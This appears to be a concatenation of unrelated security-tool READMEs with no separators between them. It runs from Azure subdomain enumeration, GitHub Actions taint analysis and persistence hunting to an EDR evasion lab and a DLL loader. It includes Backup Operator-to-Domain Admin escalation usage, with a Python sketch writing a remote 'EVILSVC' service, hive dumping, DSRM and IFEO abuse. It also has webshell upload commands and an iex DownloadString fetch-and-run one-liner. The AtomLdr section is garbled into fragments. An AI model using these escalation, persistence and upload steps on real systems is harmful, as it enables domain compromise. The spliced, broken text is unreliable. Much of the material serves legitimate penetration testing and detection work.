AzSubEnum is a subdomain enumeration tool tailored for Azure services. Through a combination of permutation techniques and DNS queries, it systematically probes the Azure domain structure and collects subdomains belonging to a wide range of Azure services.
AzSubEnum operates by combining DNS resolution with systematic permutation of a base name to uncover subdomains tied to Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more.
This helps security professionals, researchers, and administrators gain insight into the Azure services an organization exposes and their corresponding subdomains.
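To illustrate the approach (a simplified sketch, not AzSubEnum's actual code), permutation-plus-DNS-resolution enumeration can be done with just Python's standard library; the suffix map and wordlist below are abbreviated assumptions:

```python
import socket

# Hypothetical, abbreviated suffix map - AzSubEnum's real list covers many more services.
AZURE_SUFFIXES = {
    "App Services": "azurewebsites.net",
    "Storage Accounts": "blob.core.windows.net",
    "Key Vaults": "vault.azure.net",
    "Databases (MSSQL)": "database.windows.net",
}

def candidates(base, words):
    """Yield the base name plus simple permutations with each wordlist entry."""
    yield base
    for w in words:
        yield f"{base}-{w}"
        yield f"{w}-{base}"
        yield f"{base}{w}"

def enumerate_base(base, words=()):
    for service, suffix in AZURE_SUFFIXES.items():
        for name in candidates(base, words):
            fqdn = f"{name}.{suffix}"
            try:
                socket.gethostbyname(fqdn)   # it resolves, so the subdomain exists
                print(f"[+] {service}: {fqdn}")
            except socket.gaierror:
                pass                          # NXDOMAIN: candidate not in use

enumerate_base("retailcorp", words=("dev", "prod"))
```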
During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.
➜ AzSubEnum git:(main) python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]
Azure Subdomain Enumeration
options:
-h, --help show this help message and exit
-b BASE, --base BASE Base name to use
-v, --verbose Show verbose output
-t THREADS, --threads THREADS
Number of threads for concurrent execution
-p PERMUTATIONS, --permutations PERMUTATIONS
File containing permutations
Basic enumeration:
python3 azsubenum.py -b retailcorp --threads 10
Using permutation wordlists:
python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt
With verbose output:
python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt --verbose
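For reference, the permutations file is just a plain wordlist of affixes to combine with the base name; a hypothetical permutations.txt might contain:

```
dev
test
staging
prod
api
backup
```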
This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.
Visit our website - secureci.org for more information.
Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.
Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.
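As a toy illustration of the source-to-sink idea (not Argus's staged analysis), the sketch below flags a handful of well-known attacker-controlled expressions when they appear inside run: scripts of a workflow; the context list and file path are assumptions:

```python
import re
import yaml  # pip install pyyaml

# Classic attacker-controlled contexts (illustrative subset, not Argus's source model).
UNTRUSTED = re.compile(
    r"\$\{\{\s*github\.event\.(issue\.title|issue\.body|pull_request\.title"
    r"|pull_request\.body|comment\.body|head_commit\.message)\s*\}\}"
)

def naive_scan(workflow_path):
    with open(workflow_path) as f:
        doc = yaml.safe_load(f)
    for job_name, job in (doc.get("jobs") or {}).items():
        for step in job.get("steps") or []:
            script = step.get("run") or ""
            for match in UNTRUSTED.finditer(script):
                # Untrusted expression interpolated into a shell script:
                # a potential code-injection sink.
                print(f"[HIGH] {job_name}: '{match.group(0)}' flows into run:")

naive_scan(".github/workflows/ci.yml")
```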
This Python script provides a command-line interface for interacting with GitHub repositories and GitHub Actions.
python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]
--mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
--url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
--output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
--config: The config file. This parameter is optional.
--verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
--branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
--commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
--tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
--action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
--workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.
To use this script to interact with a GitHub repo, you might run a command like the following:
python argus.py --mode repo --url https://github.com/username/repo.git --branch master
This would run the script in repo mode on the master branch of the specified repository.
Argus can be run inside a docker container. To do so, follow the steps:
Results are written to the results folder. You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.
Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.
VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.
Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.
If GitHub authorization is required to run, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all requests made to GitHub. Note: we do not store this information anywhere, nor create anything in the GitHub account - we only use it for cloning repositories.
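For example, a hypothetical invocation with credentials supplied via the environment:

```
GITHUB_CREDS="username:TOKEN" python argus.py --mode repo --url https://github.com/username/repo.git --branch master
```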
Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!
If you use Argus in your research, please cite our paper:
@inproceedings{muralee2023Argus,
title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
A. Kapravelos, A. Machiry},
booktitle={32nd USENIX Security Symposium (USENIX Security 23)},
year={2023},
}
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. It leverages the Atomic Red Team project, which allows simulating attacks following MITRE TTPs (Tactics, Techniques, and Procedures), and builds on those simulations to serve as a starting point for evaluating the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
The project is based on Azure Pipelines and requires the following to be able to run:
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Currently only the Atomics from the public repository are supported. The pipeline takes a technique ID, or a comma-separated list of techniques, as input - for example:
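A hypothetical input would be T1059.001, or a list such as T1053.005,T1547.001.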
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
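The ingested logs can also be pulled programmatically; a minimal sketch assuming the azure-monitor-query and azure-identity packages (the workspace ID and query are placeholders to adapt to your deployment):

```python
from datetime import timedelta

from azure.identity import DefaultAzureCredential   # pip install azure-identity
from azure.monitor.query import LogsQueryClient     # pip install azure-monitor-query

client = LogsQueryClient(DefaultAzureCredential())

# Workspace ID is a placeholder - use your Log Analytics workspace GUID.
response = client.query_workspace(
    workspace_id="<workspace-guid>",
    query="AtomicLogs_CL | sort by TimeGenerated desc | take 20",
    timespan=timedelta(days=1),
)
for table in response.tables:
    for row in table.rows:
        print(row)
```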
There are currently two ways to run the simulation:
This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.
Warning: this will onboard a large number of hosts into your EDR
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTPs will be simulated on this instance. This is the fastest way to simulate and prevents onboarding a large number of devices; however, running many simulations in the same environment risks contaminating it and making the simulations less stable and predictable.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
git clone https://github.com/redhuntlabs/antisquat
pip install -r requirements.txt
Create a file named .openai-key and paste your ChatGPT API key in there.
Create a file named .godaddy-key and paste your GoDaddy API key in there.
Optionally, create a file named blacklist.txt and type in a line-separated list of domains you'd like to ignore. Regular expressions are supported.
Run: python3.8 antisquat.py domains.txt
Let's say you'd like to run AntiSquat on "flipkart.com". Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.
AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
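A condensed sketch of the permutation step (AntiSquat's real generator, NLP scoring, and contact extraction are more involved), using only the standard library:

```python
import socket
import string

def typo_permutations(domain):
    """Generate a few classic typosquat variants (omission, repetition, substitution)."""
    name, tld = domain.rsplit(".", 1)
    variants = set()
    for i in range(len(name)):
        variants.add(name[:i] + name[i + 1:])                 # character omission
        variants.add(name[:i] + name[i] * 2 + name[i + 1:])   # character repetition
        for c in string.ascii_lowercase:
            variants.add(name[:i] + c + name[i + 1:])         # character substitution
    variants.discard(name)
    return {f"{v}.{tld}" for v in variants if v}

for candidate in sorted(typo_permutations("flipkart.com")):
    try:
        socket.gethostbyname(candidate)   # registered/resolving candidates are interesting
        print(f"[+] {candidate} resolves")
    except socket.gaierror:
        pass
```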
A test case for amazon.com is attached. To run it without any API keys, simply run python3.8 test.py.
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
To know more about our Attack Surface Management platform, check out NVADR.
Little AV/EDR Evasion Lab for training & learning purposes. (under construction)
____ _ _____ ____ ____ ___ __ _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|
BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing the user-mode detection methods frequently used by these security solutions.
These techniques are mainly based on dynamic analysis of the target process state (memory, API calls, etc.).
Feel free to check this short article I wrote that describes the interception and analysis methods implemented by the EDR.
In progress:
Usage: BestEdrOfTheMarket.exe [args]
/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat
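As a toy illustration (Windows-only, Python/ctypes; not BestEDROfTheMarket's C++ code) of the kind of naive user-mode check such a lab implements, the snippet below compares Nt* stub prologues against the expected x64 bytes - a patched prologue suggests an inline hook:

```python
import ctypes

# An unhooked x64 Nt* stub normally begins with "mov r10, rcx" (4C 8B D1);
# a leading JMP (E9) or other patch suggests a user-land inline hook.
ntdll = ctypes.WinDLL("ntdll")
for name in ("NtAllocateVirtualMemory", "NtProtectVirtualMemory", "NtCreateThreadEx"):
    addr = ctypes.cast(getattr(ntdll, name), ctypes.c_void_p).value
    prologue = ctypes.string_at(addr, 3)
    if prologue != b"\x4c\x8b\xd1":
        print(f"[!] {name} prologue {prologue.hex()} - possibly hooked")
    else:
        print(f"[ ] {name} looks clean")
```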
Existing tools don't really "understand" code. Instead, they mostly parse texts.
DeepSecrets expands classic regex-search approaches with semantic analysis, dangerous variable detection, and more efficient usage of entropy analysis. Code understanding supports 500+ languages and formats and is achieved by lexing and parsing - techniques commonly used in SAST tools.
DeepSecrets also introduces a new way to find secrets: just use hashed values of your known secrets and get them found plain in your code.
The under-the-hood story is covered in the articles here: https://hackernoon.com/modernizing-secrets-scanning-part-1-the-problem
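The hashed-secret idea can be illustrated in a few lines (a sketch of the principle only, not DeepSecrets' HashedSecretEngine; the file path and example secret are assumptions):

```python
import hashlib
import re

# Store hashes of known secrets, never the plaintext - example value is hypothetical.
KNOWN_SECRET_HASHES = {
    hashlib.sha256(b"hunter2").hexdigest(),
}

def find_hashed_secrets(path):
    """Hash every word-like token and report collisions with known-secret hashes."""
    with open(path, encoding="utf-8", errors="ignore") as f:
        for lineno, line in enumerate(f, 1):
            for token in re.findall(r"[A-Za-z0-9_\-+/=]{6,}", line):
                if hashlib.sha256(token.encode()).hexdigest() in KNOWN_SECRET_HASHES:
                    print(f"{path}:{lineno}: known secret found: {token}")

find_hashed_secrets("app/settings.py")
```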
Pff, is it still regex-based?
Yes and no. Of course, it uses regexes and finds typed secrets like any other tool. But language understanding (the lexing stage) and variable detection also use regexes under the hood. So regexes are an instrument, not a problem.
Why don't you build true abstract syntax trees? It's academically more correct!
DeepSecrets tries to keep a balance between complexity and effectiveness. Building a true AST is a pretty complex thing and simply overkill for our specific task. So the tool still follows the generic SAST-way of code analysis but optimizes the AST part using a different approach.
I'd like to build my own semantic rules. How do I do that?
Only through the code at the moment. Formalizing the rules and moving them into a flexible, user-controlled ruleset is in the plans.
I still have a question
Feel free to communicate with the maintainer
From Github via pip
$ pip install git+https://github.com/avito-tech/deepsecrets.git
From PyPi
$ pip install deepsecrets
The easiest way:
$ deepsecrets --target-dir /path/to/your/code --outfile report.json
This will run a scan against /path/to/your/code using the default configuration.
The report will be saved to report.json.
Run deepsecrets --help for details.
Basically, you can use your own ruleset by specifying --regex-rules. Paths to be excluded from scanning can be set via --excluded-paths.
The built-in ruleset for regex checks is located in /deepsecrets/rules/regexes.json. You're free to follow the format and create a custom ruleset.
There are several core concepts:
File
Tokenizer
Token
Engine
Finding
ScanMode
File: just a pythonic representation of a file with all needed methods for management.
Tokenizer: a component able to break the content of a file into pieces - Tokens - by its logic. There are three types of tokenizers available:
FullContentTokenizer: treats all content as a single token. Useful for regex-based search.
PerWordTokenizer: breaks given content by words and line breaks.
LexerTokenizer: uses language-specific smarts to break code into semantically correct pieces with additional context for each token.
Token: a string with additional information about its semantic role, corresponding file, and location inside it.
Engine: a component performing secrets search for a single token by its own logic. Returns a set of Findings. There are three engines available:
RegexEngine: checks tokens' values through a special ruleset.
SemanticEngine: checks tokens produced by the LexerTokenizer using additional context - variable names and values.
HashedSecretEngine: checks tokens' values by hashing them and trying to find coinciding hashes inside a special ruleset.
Finding: a data structure representing a problem detected inside code. Features information about the precise location inside a file and the rule that found it.
ScanMode: this component is responsible for the scan process. PerFileAnalyzer is the method called against each file, returning a list of findings; its primary usage is to initialize necessary engines, tokenizers, and rulesets. The current implementation has a CliScanMode built from the user-provided config through the CLI args.
The project is supposed to be developed using VSCode and the 'Remote Containers' feature.
Steps:
Nodesub is a command-line tool for finding subdomains in bug bounty programs. It supports various subdomain enumeration techniques and provides flexible options for customization.
To install Nodesub, use the following command:
npm install -g nodesub
NOTE: the configuration file is located at ~/.config/nodesub/config.ini.
nodesub -h
This will display help for the tool. Here are all the switches it supports.
Enumerate subdomains for a single domain:
nodesub -u example.com
Enumerate subdomains for a list of domains from a file:
nodesub -l domains.txt
Perform subdomain enumeration using CIDR:
node nodesub.js -c 192.168.0.0/24 -o subdomains.txt
node nodesub.js -c CIDR.txt -o subdomains.txt
Perform subdomain enumeration using ASN:
node nodesub.js -a AS12345 -o subdomains.txt
node nodesub.js -a ASN.txt -o subdomains.txt
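Under the hood, CIDR enumeration boils down to reverse-resolving each address in the range; a Python sketch of the idea (Nodesub itself is Node.js, so this is illustrative only):

```python
import ipaddress
import socket

def reverse_sweep(cidr):
    """Reverse-resolve every address in a CIDR range and collect hostnames."""
    hosts = {}
    for ip in ipaddress.ip_network(cidr, strict=False).hosts():
        try:
            hostname, _, _ = socket.gethostbyaddr(str(ip))
            hosts[str(ip)] = hostname
            print(f"{ip} -> {hostname}")
        except (socket.herror, socket.gaierror):
            pass   # no PTR record for this address
    return hosts

reverse_sweep("192.168.0.0/28")
```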
Enable recursive subdomain enumeration and output the results to a JSON file:
nodesub -u example.com -r -o output.json -f json
The tool provides various output formats for the results, including:
The output file contains the resolved subdomains, the subdomains that failed to resolve, or all subdomains, depending on the options chosen.
Trawler is a PowerShell script designed to help Incident Responders discover potential indicators of compromise on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.
Currently, trawler can detect most of the persistence techniques specifically called out by MITRE and Atomic Red Team with more detections being added on a regular basis.
Just download and run trawler.ps1 from an Administrative PowerShell/cmd prompt - any detections will be displayed in the console as well as written to a CSV ('detections.csv') in the current working directory. The generated CSV will contain Detection Name, Source, Risk, Metadata and the relevant MITRE Technique.
Or use this one-liner from an Administrative PowerShell terminal:
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/joeavanzato/Trawler/main/trawler.ps1'))
Certain detections have allow-lists built-in to help remove noise from default Windows configurations (10/2016/2019/2022) - expected Scheduled Tasks, Services, etc. Of course, it is always possible for attackers to hijack these directly and masquerade with great detail as a default OS process - take care to use multiple forms of analysis and detection when dealing with skillful adversaries.
If you have examples or ideas for additional detections, please feel free to submit an Issue or PR with relevant technical details/references - the code-base is a little messy right now and will be cleaned up over time.
Additionally, if you identify obvious false positives, please let me know by opening an issue or PR on GitHub! The obvious culprits for this will be non-standard COMs, Services or Tasks.
-scanoptions : Tab-through possible detections and select a sub-set using comma-delimited terms (eg. .\trawler.ps1 -scanoptions Services,Processes)
-hide : Suppress Detection output to console
-snapshot : Capture a "persistence snapshot" of the current system, defaulting to "$PSScriptRoot\snapshot.csv"
-snapshotpath : Define a custom file-path for saving snapshot output to.
-outpath : Define a custom file-path for saving detection output to (defaults to "$PSScriptRoot\detections.csv")
-loadsnapshot : Define the path for an existing snapshot file to load as an allow-list reference
-drivetarget : Define the variable for a mounted target drive (eg. .\trawler.ps1 -drivetarget "D:") - using this alone leads to an 'assumed homedrive' variable of C: for analysis purposes
PersistenceSniper is an awesome tool - I've used it heavily in the past - but there are a few key points that differentiate these utilities
Overall, these tools are extremely similar but approach the problem from slightly different angles - PersistenceSniper provides all information back to the analyst for review while Trawler tries to limit what is returned to only results that are likely to be potential adversary persistence mechanisms. As such, there is a possibility for false-negatives with trawler if an adversary completely mimics an allow-listed item.
Trawler supports loading an allow-list from a 'snapshot' - doing this requires two steps: first, capture a snapshot of a known-clean system (e.g. .\trawler.ps1 -snapshot), then point subsequent scans at that file (e.g. .\trawler.ps1 -loadsnapshot "C:\path\to\snapshot.csv").
That's it - all relevant detections will then draw from the snapshot file as an allow-list to reduce noise and identify any potential changes to the base image that may have occurred.
(Allow-listing is implemented for most of the checks but not all - still being actively implemented)
Often during an investigation, analysts may end up mounting a new drive that represents an imaged Windows device - Trawler now partially supports scanning these mounted drives through the use of the '-drivetarget' parameter.
At runtime, Trawler will re-target temporary script-level variables for use in checking file-based artifacts and also will attempt to load relevant Registry Hives (HKLM\SOFTWARE, HKLM\SYSTEM, NTUSER.DATs, USRCLASS.DATs) underneath HKLM/HKU and prefixed by 'ANALYSIS_'. Trawler will also attempt to unload these temporarily loaded hives upon script completion.
As an example, if you have an image mounted at a location such as 'F:\Test' which contains the NTFS file system ('F:\Test\Windows', 'F:\Test\User', etc) then you can invoke trawler like below;
.\trawler.ps1 -drivetarget "F:\Test"
Please note that since trawler attempts to load the registry hive files from the drive in question, mapping a UNC path to a live remote device will NOT work as those files will not be accessible due to system locks. I am working on an approach which will handle live remote devices, stay tuned.
Most other checks will function fine because they are based entirely on reading registry hives or file-based artifacts (or can be converted to do so, such as directly reading Task XML as opposed to using built-in command-lets.)
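For instance, "directly reading Task XML" from a mounted image can be done without the Task Scheduler cmdlets; a Python sketch under an assumed mount point (Trawler itself is PowerShell - this just shows the direct-XML approach):

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# Task Scheduler XML namespace (fixed by Windows).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

def scheduled_task_commands(mounted_root):
    """Walk Task Scheduler XML under a mounted image and print each task's command line."""
    tasks_dir = Path(mounted_root) / "Windows" / "System32" / "Tasks"
    for task_file in tasks_dir.rglob("*"):
        if not task_file.is_file():
            continue
        try:
            root = ET.parse(task_file).getroot()
        except ET.ParseError:
            continue   # not a well-formed task definition
        for exec_node in root.iterfind(".//t:Exec", NS):
            cmd = exec_node.findtext("t:Command", default="", namespaces=NS)
            args = exec_node.findtext("t:Arguments", default="", namespaces=NS)
            print(f"{task_file.relative_to(tasks_dir)}: {cmd} {args}".strip())

scheduled_task_commands(r"F:\Test")   # assumed mount point from the example above
```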
Any limitations in checks when doing drive-retargeting will be discussed more fully in the GitHub Wiki.
TODO
Please be aware that some of these techniques are (of course) covered more thoroughly than others - for example, we are not detecting all possible registry modifications but rather inspecting certain keys for obvious changes and using the generic MITRE technique "Modify Registry" where no other technique is applicable. For other items, such as COM hijacking, we inspect all entries in the relevant registry section, check against 'known-good' patterns, and bubble up unknown or mismatched values, resulting in a much more complete detection surface for that particular technique.
This tool would not exist without the amazing InfoSec community - the most notable references I used are provided below.
Upload_Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
Please note that the use of Upload_Bypass and any actions taken with it are solely at your own risk. The tool is provided for educational and testing purposes only. The developer of Upload_Bypass is not responsible for any misuse, damage, or illegal activities caused by its usage.
While Upload_Bypass aims to assist Pentesters and Bug Hunters in testing file upload mechanisms, it is essential to obtain proper authorization and adhere to applicable laws and regulations before performing any security assessments. Always ensure that you have the necessary permissions from the relevant stakeholders before conducting any testing activities.
The results and findings obtained from using Upload_Bypass should be communicated responsibly and in accordance with established disclosure processes. It is crucial to respect the privacy and integrity of the tested systems and refrain from causing harm or disruption.
By using Upload_Bypass, you acknowledge that the developer cannot be held liable for any consequences resulting from its use. Use the tool responsibly and ethically to promote the security and integrity of web applications.
Download the latest version from Releases page.
pip install -r requirements.txt
The tool will not function properly if the file upload mechanism includes a CAPTCHA. Perhaps a future version will include OCR.
The tool is compatible exclusively with request files generated by Burp Suite.
Before saving the Burp file, replace the file content with the string *content*, the filename (filename.ext) with the string *filename*, and the Content-Type header value with *mimetype* (only if the tool is not able to recognize it automatically).
How a request should look before the changes:
How it should look after the changes:
If the tool fails to recognize the mime type automatically, you can add *mimetype* in the parameter's value of the Content-Type header.
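The README's before/after screenshots are not reproduced here; a hypothetical multipart fragment illustrates the substitution. Before:

```
Content-Disposition: form-data; name="file"; filename="avatar.png"
Content-Type: image/png

<binary image data>
```

After:

```
Content-Disposition: form-data; name="file"; filename="*filename*"
Content-Type: *mimetype*

*content*
```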
Options: -h, --help
show this help message and exit
-b BURP_FILE, --burp-file BURP_FILE
Required - Read from a Burp Suite file
Usage: -b / --burp-file ~/Desktop/output
-s SUCCESS_MESSAGE, --success SUCCESS_MESSAGE
Required if -f is not set - Provide the success message when a file is uploaded
Usage: -s /--success 'File uploaded successfully.'
-f FAILURE_MESSAGE, --failure FAILURE_MESSAGE
Required if -s is not set - Provide a failure message when a file is uploaded
Usage: -f /--failure 'File is not allowed!'
-e FILE_EXTENSION, --extension FILE_EXTENSION
Required - Provide server backend extension
Usage: -e / --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)
-a ALLOWED_EXTENSIONS, --allowed ALLOWED_EXTENSIONS
Required - Provide allowed extensions to be uploaded
Usage: -a / --allowed 'jpeg, png, zip, etc'
-l WEBSHELL_LOCATION, --location WEBSHELL_LOCATION
Provide a remote path where the WebShell will be uploaded (won't work if the file is uploaded with a UUID).
Usage: -l / --location /uploads/
-rl NUMBER, --rate-limit NUMBER
Set rate limiting, in milliseconds, between each request.
Usage: -rl / --rate-limit 700
-p PROXY_NUM, --proxy PROXY_NUM
Channel the HTTP requests via a proxy client (e.g. Burp Suite).
Usage: -p / --proxy http://127.0.0.1:8080
-S, --ssl
If set, the tool will not validate the TLS/SSL certificate.
Usage: -S / --ssl
-c, --continue
If set, the brute force will continue even if one of the methods gets a hit!
Usage: -c / --continue
-E, --eicar
If set, only an EICAR file (anti-malware test file) will be uploaded; WebShells will not be uploaded (suitable for real environments).
Usage: -E / --eicar
-v, --verbose
If set, details about the test will be printed on the screen
Usage: -v / --verbose
-r, --response
If set, HTTP response will be printed on the screen
Usage: -r / --response
--version
Print the current version of the tool.
--update
Checks for new updates. If there is a new update, it will be downloaded and updated automatically.
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e php -a jpeg --response -v --eicar --continue
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e asp -a zip -v
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e jsp -a png -v --proxy http://127.0.0.1:8080
The BackupOperatorToolkit (BOT) has 4 different modes that allow you to escalate from Backup Operator to Domain Admin.
Use "runas.exe /netonly /user:domain.dk\backupoperator powershell.exe" before running the tool.
The SERVICE mode creates a service on the remote host that will be executed when the host is rebooted.
The service is created by modifying the remote registry. This is possible by passing the "REG_OPTION_BACKUP_RESTORE" value to RegOpenKeyExA and RegSetValueExA.
It is not possible to have the service executed immediately as the service control manager database "SERVICES_ACTIVE_DATABASE" is loaded into memory at boot and can only be modified with local administrator privileges, which the Backup Operator does not have.
.\BackupOperatorToolkit.exe SERVICE \\PATH\To\Service.exe \\TARGET.DOMAIN.DK SERVICENAME DISPLAYNAME DESCRIPTION
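For context, a Windows service is fully described by a handful of registry values. The hedged Python sketch below writes them with winreg; note that winreg cannot pass REG_OPTION_BACKUP_RESTORE, so unlike the toolkit it assumes you already have write access (e.g., as a local admin in a lab):

```python
import winreg

# Values that define a Windows service under the Services key. The toolkit writes
# these over the remote registry with REG_OPTION_BACKUP_RESTORE (backed by the
# SeBackup/SeRestore privileges); winreg does not expose that flag, so this
# sketch only works where you already have registry write access.
hive = winreg.ConnectRegistry(r"\\TARGET.DOMAIN.DK", winreg.HKEY_LOCAL_MACHINE)
key = winreg.CreateKey(hive, r"SYSTEM\CurrentControlSet\Services\EVILSVC")
winreg.SetValueEx(key, "ImagePath", 0, winreg.REG_EXPAND_SZ, r"\\PATH\To\Service.exe")
winreg.SetValueEx(key, "Start", 0, winreg.REG_DWORD, 2)     # 2 = auto start at boot
winreg.SetValueEx(key, "Type", 0, winreg.REG_DWORD, 0x10)   # 0x10 = own process
winreg.SetValueEx(key, "ObjectName", 0, winreg.REG_SZ, "LocalSystem")
winreg.CloseKey(key)
```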
The DSRM mode will set the DsrmAdminLogonBehavior registry key found in "HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" to either 0, 1, or 2.
Setting the value to 0 will only allow the DSRM account to be used when in recovery mode.
Setting the value to 1 will allow the DSRM account to be used when the Directory Services service is stopped and the NTDS is unlocked.
Setting the value to 2 will allow the DSRM account to be used with network authentication such as WinRM.
If the DUMP mode has been used and the DSRM account has been cracked offline, set the value to 2 and log into the Domain Controller with the DSRM account which will be local administrator.
.\BackupOperatorToolkit.exe DSRM \\TARGET.DOMAIN.DK 0||1||2
The DUMP mode will dump the SAM, SYSTEM, and SECURITY hives to a local path on the remote host or upload the files to a network share.
Once the hives have been dumped, you could PtH with the Domain Controller hash, crack DSRM and enable network auth, or possibly authenticate with another account found in the dumps. Accounts from other forests may be stored in these files; I'm not sure why, but this has been observed on engagements with management forests. This mode is inspired by the BackupOperatorToDA project.
.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK
The IFEO (Image File Execution Options) mode will enable you to run an application when a specific process is terminated.
This could grant a shell sooner than the SERVICE mode in case the target host is heavily utilized and rarely rebooted.
The executable will be running as a child to the WerFault.exe process.
.\BackupOperatorToolkit.exe IFEO notepad.exe \\Path\To\pwn.exe \\TARGET.DOMAIN.DK
A DLL Loader With Advanced Evasive Features
"Atom"
function via the command line.CRC32
string hashing algorithm.AtomLdr's unhooking method looks like the following
Unhooking from the \KnownDlls\ directory is not a new method to bypass user-land hooks. However, this loader tries to avoid allocating RWX memory when doing so. That was obligatory in KnownDllUnhook, for example, where RWX permissions were needed to replace the text sections of the hooked modules while still allowing execution of the functions within them.
